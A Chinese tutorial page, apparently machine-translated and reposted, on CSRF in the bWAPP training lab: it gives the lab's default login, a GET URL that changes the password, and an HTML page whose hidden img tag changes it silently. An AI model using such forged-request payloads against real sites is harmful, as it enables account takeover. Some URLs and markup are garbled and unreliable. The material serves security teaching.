如何解析CSRF漏洞

技术如何解析CSRF漏洞这篇文章给大家介绍如何解析CSRF漏洞,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。CSRF:跨站请求伪造,伪装成用户身份来执行一些非用户自愿的恶意以及非法操作CSRF和XS

本文向您介绍如何分析CSRF漏洞。内容非常详细。有兴趣的朋友可以参考一下,希望对你有帮助。

CSRF:跨站点请求伪造,伪装成用户身份执行一些非用户自愿的恶意非法操作。

CSRF和XSS的区别:

1.CSRF登录后需要操作,但XSS不需要。

2.CSRF通过伪装成可信用户来请求可信网站。

一、环境:BWAPP

第二,登录,默认账号是bee,密码是bug。

如何解析CSRF漏洞

3.从csrf中的页面选择将密码更改为1111,更改。

第四,分析网址

http://192 . 168 . 1 . 119/bwapp/csrf _ 1 . PHP?password _ new=1111 password _ conf=1111 action=change

5.注销帐户,然后再次登录。密码已更改为1111。

6.修改网址,直接访问这个地址。

http://192 . 168 . 1 . 119/bwapp/csrf _ 1 . PHP?password _ new=2222 password _ conf=2222 action=change

密码被重置为2222。

七、隐蔽使用

1.创建一个新的html页面,再次修改url地址,并将其添加到img标签下的src属性中。

!DOCTYPE html html标题标题哦,那就好。/title /head body h3好久不见h3img src=' http://192 . 168 . 1 . 119/bwapp/csrf _ 1.php?password _ new=3333 password _ conf=3333 action=change '/body/html

2.访问这个html,自动访问修改后的url,密码自动修改。

我希望在这里分享如何解决CSRF的弱点。

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/140993.html

(0)

相关推荐

  • 无锡旅游景点大全,去无锡旅游哪些景点值得推荐

    技术无锡旅游景点大全,去无锡旅游哪些景点值得推荐无锡是个好地方,有水有山,可以说依山傍水,有很多著名的可供游人一赏。1、太湖,当你听到太湖美这首歌曲时,你就会感到太湖美,名副其实无锡旅游景点大全;2、三国水浒城,又是中央

    生活 2021年10月24日
  • go并发中select的示例分析

    技术go并发中select的示例分析这篇文章给大家分享的是有关go并发中select的示例分析的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。一、前言介绍:对于Go语言并发通讯,是使用的协程go

    攻略 2021年11月17日
  • windows API怎么使用入门sleep

    技术windows API怎么使用入门sleepwindows API怎么使用入门sleep,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。windows

    攻略 2021年10月23日
  • 女领导有请,如何与不懂权谋的女领导相处

    技术女领导有请,如何与不懂权谋的女领导相处如何与不懂权谋的女领导相处女领导有请?这个问题让我看到许多可谋取的工作利益,因为我曾经就遇到过这样的搭配,女领导只有职权没有强项,但却突显出她手底下的员工更加优秀。其实不管是女领

    生活 2021年10月21日
  • C++怎么将连结线程看作范围化的容器

    技术C++怎么将连结线程看作范围化的容器这篇文章主要讲解了“C++怎么将连结线程看作范围化的容器”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“C++怎么将连结线程看作范围

    攻略 2021年11月25日
  • jsf编程简单方法(jsf入门)

    技术怎样分析JSF的中文问题怎样分析JSF的中文问题,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。开始学习JSF的时候有遇上中文问题,看了一

    攻略 2021年12月14日